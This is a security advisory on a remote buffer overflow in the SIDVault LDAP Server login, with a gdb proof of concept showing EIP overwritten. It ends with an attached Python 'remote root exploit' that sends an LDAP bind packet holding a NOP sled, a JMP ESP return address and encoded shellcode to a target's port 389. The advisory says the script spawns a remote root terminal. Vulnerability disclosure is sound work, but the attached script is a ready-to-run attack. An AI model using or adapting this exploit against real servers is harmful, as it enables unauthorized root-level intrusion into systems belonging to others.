SIDVault LDAP Server Remote Buffer Overflow =========================================== Product Description: SIDVault LDAP Server for Win32 and GNU/Linux SIDVault is a Simple Integration Database, allowing easy management and installations with high performance LDAP v3 server. It supports any number of schemas, easy to add/modify existing schemas, integrated web based user access, and fast browser based administration tools. Supports all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS. Vulnerable versions: Win32 2.0e Linux 2.0d Vulnerability Details: The login mechanism is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer. Successfully exploiting the issue will allow an attacker to execute arbitrary code with root or SYSTEM-level privileges depending on the operative system target. Failed exploit attempts will result in a denial-of-service condition. Proof of concept: # gdb /usr/local/sidvault/sidvault (...) (gdb) r -run In another terminal: $ cat poc.py import ldap l = ldap.open("localhost") l.simple_bind("dc=" + "A"*4099, "B"*256) $ ./poc.py In the first terminal: Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1226736720 (LWP 5942)] 0x41414141 in ?? () (gdb) where #0 0x41414141 in ?? () #1 0x41414141 in ?? () (...) Quit (gdb) i r eax 0x8202c48 136326216 ecx 0x0 0 edx 0xb6e164df -1226742561 ebx 0x41414141 1094795585 esp 0xb6e16500 0xb6e16500 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141 Exploit: An exploit for Debian based distributions which spawns a remote root terminal has been writen. See the attached exploit. Patch information: The problem is solved in the latest version (2.0f) which is available in the vendor's website at http://www.alphacentauri.co.nz/. Thanks: Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind and professional. Disclaimer: The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Contact: Joxean Koret - joxeankoret[at]yahoo[dot]es
#!/usr/bin/python """ Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days) """ import sys import socket sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" sc += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" sc += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" sc += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" sc += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x33\x4b\x4d\x43\x35" sc += "\x43\x44\x43\x45\x4c\x56\x44\x30\x4c\x46\x48\x56\x4a\x45\x49\x49" sc += "\x49\x38\x41\x4e\x4d\x4c\x42\x58\x48\x59\x43\x44\x44\x55\x48\x36" sc += "\x4a\x36\x41\x31\x4e\x35\x48\x46\x43\x35\x49\x58\x41\x4e\x4c\x56" sc += "\x48\x56\x4a\x55\x42\x45\x41\x55\x48\x35\x49\x48\x41\x4e\x4d\x4c" sc += "\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x48\x44\x35" sc += "\x44\x55\x48\x45\x43\x54\x49\x38\x41\x4e\x42\x4b\x48\x36\x4d\x4c" sc += "\x42\x38\x43\x39\x4c\x46\x44\x30\x49\x55\x42\x4b\x4f\x43\x4d\x4c" sc += "\x42\x38\x49\x54\x49\x47\x49\x4f\x42\x4b\x4b\x50\x44\x35\x4a\x46" sc += "\x4f\x32\x4f\x42\x43\x57\x4a\x46\x4a\x36\x4f\x32\x44\x56\x49\x36" sc += "\x50\x46\x49\x38\x43\x4e\x44\x45\x43\x35\x49\x58\x41\x4e\x4d\x4c" sc += "\x42\x48\x5a" # # The address we will use is 0xffffe777 (JMP ESP in Ubuntu's linux-gate.so) # addr = "\x77\xe7\xff\xff" theLine = '\x90'*2076 + addr+ '\x90'*(2019-len(sc)) + sc pkt = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc=' pkt += theLine pkt += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 389)) s.send(pkt) s.close()
Attachment:
signature.asc
Description: This is a digitally signed message part